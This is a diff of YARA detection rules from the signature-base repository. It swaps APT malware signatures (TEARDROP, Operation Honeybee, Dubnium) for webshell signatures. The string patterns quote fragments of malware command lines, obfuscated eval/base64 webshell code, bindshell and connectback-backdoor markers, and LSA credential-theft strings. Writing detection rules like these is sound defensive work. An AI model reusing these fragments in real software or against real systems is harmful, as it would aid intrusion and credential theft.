-		$sr1 = /\[byte\[\]\]@\([\x09\x20]{0,32}0xaa[\x09\x20]{0,32},[\x09\x20]{0,32}0xd3[\x09\x20]{0,32},[\x09\x20]{0,32}0xb4[\x09\x20]{0,32},[\x09\x20]{0,32}0x35[\x09\x20]{0,32},/ ascii nocase wide
-		$sr2 = /\[bitconverter\]::toint32\(\$\w{1,64}\[0x0c..0x0f\][\x09\x20]{0,32},[\x09\x20]{0,32}0\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}0xcc\x3b/ ascii nocase wide
-		$sr3 = /\[byte\[\]\]\(\$\w{1,64}\.padright\(\d{1,2}\)\.substring\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,2}\)\.tochararray\(\)\)/ ascii nocase wide
-		$ss1 = "[text.encoding]::ascii.getbytes(\"ntpassword\x600\");" ascii nocase wide
-		$ss2 = "system\\currentcontrolset\\control\\lsa\\$_" ascii nocase wide
-		$ss3 = "[security.cryptography.md5]::create()" ascii nocase wide
-		$ss4 = "[system.security.principal.windowsidentity]::getcurrent().name" ascii nocase wide
-		$ss5 = "out-file" ascii nocase wide
-		$ss6 = "convertto-securestring" ascii nocase wide
+		$s0 = "http://michaeldaw.org   2006"
+		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
+		$s3 = "coded by z0mbie"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Dropper_Raw64_TEARDROP_1
+rule SIGNATURE_BASE_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_Php
 {
 	meta:
-		description = "This rule looks for portions of the TEARDROP backdoor that are vital to how it functions. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory."
-		author = "FireEye"
-		id = "88adad58-ba16-5996-9ea8-ea356c3ed5b2"
-		date = "2020-12-14"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L141-L156"
+		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e91114ce-18f9-51cd-b41c-b796960ea4fe"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3660-L3672"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ab5197e7a1a123055b361a2ef79f8a77a7935606fccc8f163ea5914c94cd14d"
-		score = 85
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+		logic_hash = "a0606dad4474579354709fe6306d15427afc4dec8ad6760a0ee9e91c86c23e4d"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$sb1 = { C7 44 24 ?? 80 00 00 00 [0-64] BA 00 00 00 80 [0-32] 48 8D 0D [4-32] FF 15 [4] 48 83 F8 FF [2-64] 41 B8 40 00 00 00 [0-64] FF 15 [4-5] 85 C0 7? ?? 80 3D [4] FF }
-		$sb2 = { 80 3D [4] D8 [2-32] 41 B8 04 00 00 00 [0-32] C7 44 24 ?? 4A 46 49 46 [0-32] E8 [4-5] 85 C0 [2-32] C6 05 [4] 6A C6 05 [4] 70 C6 05 [4] 65 C6 05 [4] 67 }
-		$sb3 = { BA [4] 48 89 ?? E8 [4] 41 B8 [4] 48 89 ?? 48 89 ?? E8 [4] 85 C0 7? [1-32] 8B 44 24 ?? 48 8B ?? 24 [1-16] 48 01 C8 [0-32] FF D0 }
+		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
+		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
+		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Dropper_Win64_TEARDROP_1 : FILE
+rule SIGNATURE_BASE_Nshell__1__Php_Php
 {
 	meta:
-		description = "This rule is intended match specific sequences of opcode found within TEARDROP, including those that decode the embedded payload. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory. (comment by Nextron: prone to False Positives)"
-		author = "FireEye"
-		id = "15dfdb74-5ca3-5bc6-be7a-730333b03ba5"
-		date = "2020-12-14"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_solarwinds_sunburst.yar#L157-L174"
+		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "44e8b6c5-6f41-5c37-a083-26acedd91956"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3673-L3684"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a1fa9b9c700601d10cb77ec714b972f04308de615dfc519f680fc956227cc11d"
-		score = 70
+		hash = "973fc89694097a41e684b43a21b1b099"
+		logic_hash = "53c7cd24c4eddbded1b4c16fd2758bdf66c0bbe396e487a56d56fc053cf3cc1a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$loc_4218FE24A5 = { 48 89 C8 45 0F B6 4C 0A 30 }
-		$loc_4218FE36CA = { 48 C1 E0 04 83 C3 01 48 01 E8 8B 48 28 8B 50 30 44 8B 40 2C 48 01 F1 4C 01 FA }
-		$loc_4218FE2747 = { C6 05 ?? ?? ?? ?? 6A C6 05 ?? ?? ?? ?? 70 C6 05 ?? ?? ?? ?? 65 C6 05 ?? ?? ?? ?? 67 }
-		$loc_5551D725A0 = { 48 89 C8 45 0F B6 4C 0A 30 48 89 CE 44 89 CF 48 F7 E3 48 C1 EA 05 48 8D 04 92 48 8D 04 42 48 C1 E0 04 48 29 C6 }
-		$loc_5551D726F6 = { 53 4F 46 54 57 41 52 45 ?? ?? ?? ?? 66 74 5C 43 ?? ?? ?? ?? 00 }
+		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
+		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_Honeybee_Dropper_Maldoc : FILE
+rule SIGNATURE_BASE_Shankar_Php_Php
 {
 	meta:
-		description = "Detects samples from Operation Honeybee"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4e8dec29-2c0a-5760-91c9-88f67505a7f1"
-		date = "2018-03-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_honeybee.yar#L13-L35"
+		description = "Semi-Auto-generated  - file shankar.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "0c8ab3eb-574b-5e5a-8117-4efecef94f83"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3685-L3697"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8bc680a59a7bd269eea001c2c74e41ecd93a9b848210779fc7d9c24dfab7767a"
+		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
+		logic_hash = "58b365206c18b8394cf1e03b71b8e47be10bc933bc2c05b7b03b7dad94f6d6b8"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "86981680172bbf0865e7693fe5a2bbe9b3ba12b3f1a1536ef67915daab78004c"
-		hash2 = "0d4352322160339f87be70c2f3fe096500cfcdc95a8dea975fdfc457bd347c44"
+		tags = ""
 
 	strings:
-		$x1 = "cmd /c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32"
-		$x2 = "del /f /q %TEMP%\\setup.cab && cliconfg.exe"
-		$s1 = "SELECT * FROM Win32_Processor" fullword ascii
-		$s2 = "\"cmd /c `wusa " fullword ascii
-		$s3 = "sTempPathP" fullword ascii
-		$s4 = "sTempFile" fullword ascii
-		$s5 = "GetObjectz" fullword ascii
-		$s6 = "\\setup.cab" ascii
+		$sAuthor = "ShAnKaR"
+		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
+		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 400KB and ( 1 of ( $x* ) or 4 of them )
+		1 of ( $s* ) and $sAuthor
 }
-
-rule SIGNATURE_BASE_Ophoneybee_Malware_1 : FILE
+rule SIGNATURE_BASE_Casus15_Php_Php
 {
 	meta:
-		description = "Detects malware from Operation Honeybee"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5f48434e-efe6-5cd8-85e2-eabf528e6c58"
-		date = "2018-03-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_honeybee.yar#L37-L71"
+		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ba6748a2-fb80-5eda-816c-155bab9285e5"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3698-L3710"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5cd37bc515bc1dd61ee58cfdf34622e4f884cc771d1fa2c793986be94b751a70"
+		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
+		logic_hash = "6ee7a07163d33ca329d3be2084406629711db14db4605e8413ee963eb0f9d5a7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d31fe5cfa884e04ee26f323b8d104dcaa91146f5c7c216212fd3053afaade80f"
-		hash2 = "fc2bcd38659ae83fd25b4f7091412ae9ba011612fa4dcc3ef665b2cae2a1d74f"
-		hash3 = "2c5e5c86ca4fa172341c6bcbaa50984fb168d650ae9a33f2c6e6dccc1d57b369"
-		hash4 = "439c305cd408dbb508e153caab29d17021a7430f1dbaec0c90ac750ba2136f5f"
+		tags = ""
 
 	strings:
-		$x1 = "cmd /c taskkill /im cliconfg.exe /f /t && del /f /q" fullword ascii
-		$x2 = "\\FTPCom_vs10\\Release\\Engine.pdb" ascii
-		$x3 = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv" fullword ascii
-		$x4 = "D:\\Task\\MiMul\\" ascii
-		$s1 = "[DLL_PROCESS_ATTACH]" fullword ascii
-		$s2 = "cmd /c systeminfo >%s" fullword ascii
-		$s3 = "post.txt" fullword ascii
-		$s4 = "\\temp.ini" ascii
-		$s5 = "[GetFTPAccountInfo_10001712]" fullword ascii
-		$s6 = "ComSysAppMutex" fullword ascii
-		$s7 = "From %s (%02d-%02d %02d-%02d-%02d).txt" fullword ascii
-		$s8 = "%s %s %c%s%c" fullword ascii
-		$s9 = "TO EVERYONE" fullword ascii
+		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
+		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
+		$s3 = "value='Calistirmak istediginiz "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e14b59a79999cc0bc589a4cb5994692a" or pe.imphash ( ) == "64400f452e2f60305c341e08f217b02c" or 1 of ( $x* ) or 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Ophoneybee_Maocheng_Dropper : FILE
+rule SIGNATURE_BASE_Small_Php_Php
 {
 	meta:
-		description = "Detects MaoCheng dropper from Operation Honeybee"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b163e08e-3892-55f6-ae3e-30d2ba3f4310"
-		date = "2018-03-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_honeybee.yar#L73-L86"
+		description = "Semi-Auto-generated  - file small.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cf4fb88f-a312-560d-be0b-b55bfcb889be"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3711-L3723"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "85bcde1d821c052636a75dce4d8c3753188dd7da5fce2b3401d51c02d1c2fa6b"
+		hash = "fcee6226d09d150bfa5f103bee61fbde"
+		logic_hash = "e0444aa604e8956d423037b70b9476f5653503055d0f1bc875d43de144ce5c44"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "35904f482d37f5ce6034d6042bae207418e450f4"
+		tags = ""
 
 	strings:
-		$x1 = "\\MaoCheng\\Release\\" ascii
+		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
+		$s4 = "@ini_set('error_log',NULL);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_1 : FILE
+rule SIGNATURE_BASE_Shellbot_Pl
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "377ecbaa-9324-562e-a973-0276d44f3feb"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L10-L24"
+		description = "Semi-Auto-generated  - file shellbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "07c145b1-c9f7-564a-b354-a6d2072f380c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3724-L3738"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "94763f42dacbeede9a72c3ecc222164a5808bd74c5d2d783c76831221a9c30c8"
+		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
+		logic_hash = "5db224e4fe8608bb53f044ca6c0361dc66cadd58c6d4ea5ab4f8ae14ebde0e6e"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+		tags = ""
 
 	strings:
-		$key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii
-		$key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii
+		$s0 = "ShellBOT"
+		$s1 = "PacktsGr0up"
+		$s2 = "CoRpOrAtIoN"
+		$s3 = "# Servidor de irc que vai ser usado "
+		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_2 : FILE
+rule SIGNATURE_BASE_Fuckphpshell_Php
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "894dc893-25fc-5fdc-9f69-8085b94e1af1"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L26-L40"
+		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "010db63b-ff72-5f97-8651-a1c7851471ff"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3739-L3752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b633a7e002609fa78b0de8fb818af1b47fbe77497d161b6b41602fb34780ca8"
+		hash = "554e50c1265bb0934fcc8247ec3b9052"
+		logic_hash = "0c993960b4ca880b818c7b7ba726479ed1c64c46ef8ca82d3c990d69ebe43f42"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		tags = ""
 
 	strings:
-		$x1 = ":*:::D:\\:c:~:" fullword ascii
-		$s2 = "SPMUVR" fullword ascii
+		$s0 = "$succ = \"Warning! "
+		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
+		$s2 = "\\*=-- MEMBERS AREA --=*/"
+		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_3 : FILE
+rule SIGNATURE_BASE_Ngh_Php_Php
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "66f66139-88df-5ba9-a3fc-ba4fc98ce3f9"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L42-L62"
+		description = "Semi-Auto-generated  - file ngh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "2d8ff3c1-d6b3-57ce-8213-232b376dbd05"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3753-L3767"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "851efb71cd80040fdd13d9961d1e0084421c783afc43417ff1ac3ed023a73ae1"
+		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
+		logic_hash = "c794b216bafdaecf5bd138cc8c7552efbb8c3c571a441489d02a19793a4c294f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8"
-		hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5"
-		hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827"
+		tags = ""
 
 	strings:
-		$x1 = "copy /y \"%s\" \"%s\" " fullword ascii
-		$x2 = "del /f \"%s\" " fullword ascii
-		$s1 = "del /f /ah \"%s\" " fullword ascii
-		$s2 = "if exist \"%s\" goto Rept " fullword ascii
-		$s3 = "\\*.*.lnk" ascii
-		$s4 = "Dropped" fullword ascii
+		$s0 = "Cr4sh_aka_RKL"
+		$s1 = "NGH edition"
+		$s2 = "/* connectback-backdoor on perl"
+		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
+		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_5 : FILE
+rule SIGNATURE_BASE_Jsp_Reverse_Jsp
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "09c1aeee-9437-54e9-967f-3c2fcc0736ed"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L64-L87"
+		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4953b230-4cd9-55d6-a3cb-8d3713e7fb0c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3768-L3780"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f84f502ba9a4fe304851badfa98d9e8500cdef472d4358cfd327365ac04dda3"
+		hash = "8b0e6779f25a17f0ffb3df14122ba594"
+		logic_hash = "bdd2db4c032b25faaaf3a3a8e769000013f643ecfcb8b0374165a244ad2162a6"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
-		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
-		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
-		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
-		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
-		hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
-		hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
-		hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
-		hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+		tags = ""
 
 	strings:
-		$s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii
-		$s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii
+		$s0 = "// backdoor.jsp"
+		$s1 = "JSP Backdoor Reverse Shell"
+		$s2 = "http://michaeldaw.org"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_6 : FILE
+rule SIGNATURE_BASE_Tool_Asp
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "43366f1a-784d-515e-a8e9-3e924f2abfd8"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L89-L107"
+		description = "Semi-Auto-generated  - file Tool.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e5e727bd-836b-5540-8755-40f37904bc03"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3781-L3794"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3425734b3259ebd5390cf16d2e394a4cc735dc3fc9fcc627b46bcc77729e465e"
+		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
+		logic_hash = "d6bd782302b2c614fc572babb3825c0e1fcd0de5841ca8541ca27580ccc274d4"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
-		hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
-		hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+		tags = ""
 
 	strings:
-		$s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii
-		$s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii
-		$s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii
+		$s0 = "mailto:rhfactor@antisocial.com"
+		$s2 = "?raiz=root"
+		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
+		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Dubnium_Sample_7 : FILE
+rule SIGNATURE_BASE_NT_Addy_Asp
 {
 	meta:
-		description = "Detects sample mentioned in the Dubnium Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6712bd5f-6bbc-5ca0-9fc7-b2013b8f8147"
-		date = "2016-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/AW9Cuu"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L109-L131"
+		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "18f5f360-8690-5e09-ac18-b8cc4f678811"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3795-L3807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "76cf4acee025fcae1dec975a124f4bf808f1f09f99f7fa6a4e965febd6a89e3a"
+		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
+		logic_hash = "0fc61d5e276786b8be822712cdcfc81146998e535532e44d3da92e0668713a48"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
-		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
